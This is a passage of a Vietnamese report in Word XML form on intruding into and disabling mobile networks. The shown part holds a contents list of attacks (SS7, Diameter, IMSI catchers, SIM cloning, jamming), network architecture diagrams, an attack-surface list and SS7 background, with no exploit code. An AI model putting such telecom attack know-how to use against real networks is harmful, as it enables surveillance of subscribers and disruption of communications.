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4abde21c7fe51f1f606d7477e6a7c2ff45df6cb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Báo Cáo Khoa Học: Kỹ Thuật Xâm Nhập và Vô Hiệu Hóa Mạng Di Động</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lĩnh vực:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An toàn thông tin – Bảo mật mạng viễn thông</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phân loại:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nghiên cứu học thuật – Phân tích lỗ hổng kỹ thuật</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ngày:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2026-06-08</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="mục-lục"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mục Lục</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X503f43002c1567702bf66f58be8ac91bc858057">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Tổng Quan Kiến Trúc Mạng Di Động</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xf138d87eaedb1f480261311845d1acaba3ddf89">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SS7 Exploitation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X4b657f73239f6f30652ddfe8aa4d8648fa36abb">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Diameter Protocol Attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X618ae565c1c1041ba475962fb7237a9df6b3bec">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">IMSI Catcher</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X465a12a18a9db88a5c9b316018104fb413c7efb">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SIM Cloning / Intercept</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X85616c6d7782d33b289a521657b4237bd72613b">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Fake eNodeB (SDR-based)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X80a7e2a5b5569a3ac2e3c5d6e5c0bb33a611d6c">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SS7 Call Redirection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X40d08b13df9544541673278d2d9295345152746">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Selective Jamming</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X6708c2bc5ff032fa3c36dd86f552d214c393b4c">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">TV / DVB Signal Hijacking</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X4ff38ed4db1fee469f642ba56b6a132810cec80">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Kết Hợp Tấn Công Đa Vector</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xb090aa4c03ce2922b2e957cd028ed47535f1481">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">So Sánh Và Phân Loại</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xa7648eed40a91279b983510f2c0f319c5134cfd">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Cơ Chế Phòng Thủ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="Xe09084acb23ff85222f1fab229412a8ee147ea3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Kết Luận</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="X7a14c8dd35807c6bc404a15bb21f8ee1238beee">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Tài Liệu Tham Khảo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="13" w:name="tổng-quan-kiến-trúc-mạng-di-động"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Tổng Quan Kiến Trúc Mạng Di Động</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để hiểu đầy đủ bề mặt tấn công, cần nắm kiến trúc phân lớp của mạng di động qua các thế hệ:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="10" w:name="kiến-trúc-mạng-2ggsm"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Kiến Trúc Mạng 2G/GSM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌──────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                         CORE NETWORK (CN)                        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                                                  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  ┌─────────┐    ┌─────────┐    ┌─────────┐    ┌─────────────┐   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │   HLR   │    │   VLR   │    │   MSC   │    │   SMSC/GMSC │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │(Home    │◄──►│(Visitor │◄──►│(Mobile  │◄──►│(SMS/Gateway │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │ Location│    │ Location│    │ Switch  │    │  MSC)       │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │ Register│    │ Register│    │ Center)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SS7 Signalling Network (MTP + MAP)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BSS (Base Station  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                    │   Subsystem)         │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                    │  BSC ──────── BTS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Mobile Station    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                    │   (MS / Điện thoại) │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                    └─────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Giao diện chính bị khai thác:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A-interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: MSC ↔ BSC (kết nối lõi và vô tuyến)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MAP (Mobile Application Part)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Giao thức L7 trên SS7, dùng giữa HLR/MSC/VLR/SMSC</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="kiến-trúc-mạng-4glte-epc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Kiến Trúc Mạng 4G/LTE (EPC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌────────────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    EVOLVED PACKET CORE (EPC)                           │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                                                        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  ┌───────┐  S6a  ┌───────┐  S11  ┌───────┐  S5/S8  ┌──────────────┐  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │  HSS  │◄─────►│  MME  │◄─────►│ S-GW  │◄───────►│    P-GW      │  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │(Home  │       │(Mobil.│       │(Serv. │         │(PDN Gateway) │  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │Subscr.│       │ Mgmt. │       │ GW)   │         └──────────────┘  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │Server)│       │Entity)│       └───────┘                           │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  └───────┘       └───┬───┘                                            │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                      │ S1-MME                                         │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  ┌───────────────────────────────────────────────┐                    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │            Diameter Protocol (S6a, Gx, Gy...) │                    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  └───────────────────────────────────────────────┘                    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└────────────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                          │ S1-U / S1-MME</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">               ┌──────────▼──────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">               │  E-UTRAN            │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">               │  eNodeB (trạm LTE)  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">               └──────────┬──────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                          │ LTE-Uu (air interface)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">               ┌──────────▼──────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">               │  UE (User Equipment)│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">               └─────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Giao diện chính bị khai thác:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">S6a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: MME ↔ HSS qua Diameter (nhận dạng, xác thực, hồ sơ thuê bao)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LTE-Uu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Giao diện không dây giữa UE và eNodeB (IMSI catcher, fake eNodeB)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="bề-mặt-tấn-công-tổng-hợp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 Bề Mặt Tấn Công Tổng Hợp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lớp vật lý / vô tuyến (L1–L2):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── IMSI Catcher (GSM/3G/4G)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Fake eNodeB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── Selective Jamming</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lớp giao thức báo hiệu (L7 – Signalling Plane):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── SS7 MAP exploitation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Diameter EPC attacks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── SS7 Call Redirection</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lớp vật lý SIM (Physical):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── SIM Cloning / Intercept</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lớp phát sóng (Broadcast RF):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── DVB / TV Signal Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="30" w:name="ss7-exploitation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. SS7 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="14" w:name="lịch-sử-và-bối-cảnh"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Lịch Sử và Bối Cảnh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SS7 được thiết kế từ năm 1975 bởi CCITT (nay là ITU-T), hoàn thiện vào 1980 và triển khai đại trà vào thập niên 1990. Toàn bộ hệ thống viễn thông toàn cầu – định tuyến cuộc gọi quốc tế, roaming, SMS liên mạng – phụ thuộc vào SS7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Năm 2008, Tobias Engel lần đầu trình bày tại 25C3 về khả năng theo dõi vị trí qua SS7. Năm 2014, cùng với Karsten Nohl, nhóm Security Research Labs trình diễn live tracking tại Quốc hội Mỹ, chứng minh khả năng theo dõi điện thoại của nghị sĩ Mỹ từ Berlin. Kể từ đó, SS7 exploitation trở thành chủ đề được nghiên cứu rộng rãi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="15" w:name="ngăn-xếp-giao-thức-ss7-chi-tiết"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Ngăn Xếp Giao Thức SS7 Chi Tiết</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌────────────────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  MAP (Mobile Application Part) – 3GPP TS 29.002        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  Các operation: SRI, PSI, ISD, RegisterSS, ForwardSM...│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├────────────────────────────────────────────────────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  TCAP (Transaction Capabilities Application Part)       │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  ITU-T Q.771–Q.775: Quản lý giao dịch, dialogue        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├────────────────────────────────────────────────────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  SCCP (Signalling Connection Control Part)              │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  ITU-T Q.711–Q.716: Định tuyến theo Global Title (GT)  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├────────────────────────────────────────────────────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  MTP3 (Message Transfer Part Level 3)                   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  ITU-T Q.704: Định tuyến theo Point Code (PC)          │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
